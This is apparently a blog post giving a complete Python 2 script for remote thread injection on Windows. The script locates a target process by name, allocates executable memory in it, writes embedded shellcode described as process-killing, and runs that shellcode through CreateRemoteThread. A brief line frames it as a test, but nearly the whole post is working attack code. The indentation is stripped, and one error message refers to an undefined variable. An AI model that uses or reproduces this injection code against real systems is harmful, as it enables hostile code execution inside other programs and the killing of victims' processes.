Using Python to implement remote thread injection, this example is to test related work. Parameter is the name of the process to be injected:
import sys
import ctypes
from ctypes import *
PAGE_EXECUTE_READWRITE = 0x00000040
PROCESS_ALL_ACCESS = ( 0x000F0000 | 0x00100000 | 0xFFF )
VIRTUAL_MEM = ( 0x1000 | 0x2000 )
kernel32 = windll.kernel32
pName = sys.argv[1]
if not sys.argv[1]:
print "Code Injector: ./code_injector.py <name to inject>"
sys.exit(0)
shellcode = \
"\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42"\
"\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03"\
"\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b"\
"\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e"\
"\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c"\
"\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74"\
"\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe"\
"\x49\x0b\x31\xc0\x51\x50\xff\xd7";
code_size = len(shellcode)
TH32CS_SNAPPROCESS = 0x00000002
class PROCESSENTRY32(ctypes.Structure):
_fields_ = [("dwSize", ctypes.c_ulong),
("cntUsage", ctypes.c_ulong),
("th32ProcessID", ctypes.c_ulong),
("th32DefaultHeapID", ctypes.c_ulong),
("th32ModuleID", ctypes.c_ulong),
("cntThreads", ctypes.c_ulong),
("th32ParentProcessID", ctypes.c_ulong),
("pcPriClassBase", ctypes.c_ulong),
("dwFlags", ctypes.c_ulong),
("szExeFile", ctypes.c_char * 260)]
def getProcPid(procName):
CreateToolhelp32Snapshot = ctypes.windll.kernel32.CreateToolhelp32Snapshot
Process32First = ctypes.windll.kernel32.Process32First
Process32Next = ctypes.windll.kernel32.Process32Next
CloseHandle = ctypes.windll.kernel32.CloseHandle
hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)
pe32 = PROCESSENTRY32()
pe32.dwSize = ctypes.sizeof(PROCESSENTRY32)
if Process32First(hProcessSnap,ctypes.byref(pe32)) == False:
return
if pe32.szExeFile == procName:
CloseHandle(hProcessSnap)
return pe32.th32ProcessID
while True:
#yield pe32 #save the pe32
if Process32Next(hProcessSnap,ctypes.byref(pe32)) == False:
break
if pe32.szExeFile == procName:
CloseHandle(hProcessSnap)
return pe32.th32ProcessID
CloseHandle(hProcessSnap)
procPid = getProcPid(pName)
print procPid
# Get a handle to the process we are injecting into.
h_process = kernel32.OpenProcess( PROCESS_ALL_ACCESS, False, procPid )
if not h_process:
print "[*] Couldn't acquire a handle to PID: %s" % pid
sys.exit(0)
# Allocate some space for the shellcode
arg_address = kernel32.VirtualAllocEx( h_process, 0, code_size, VIRTUAL_MEM, PAGE_EXECUTE_READWRITE)
# Write out the shellcode
written = c_int(0)
kernel32.WriteProcessMemory(h_process, arg_address, shellcode, code_size, byref(written))
# Now we create the remote thread and point it's entry routine
# to be head of our shellcode
thread_id = c_ulong(0)
if not kernel32.CreateRemoteThread(h_process,None,0,arg_address,None,0,byref(thread_id)):
print "[*] Failed to inject process-killing shellcode. Exiting."
sys.exit(0)
print "[*] Remote thread successfully created with a thread ID of: 0x%08x" % thread_id.value
Reference resources:
1. Python grey hat
2. http://blog.csdn.net/chollima/article/details/7669522
3.http://www.exploit-db.com/exploits/28996/
157 original articles published, 64 praised, 880000 visitors+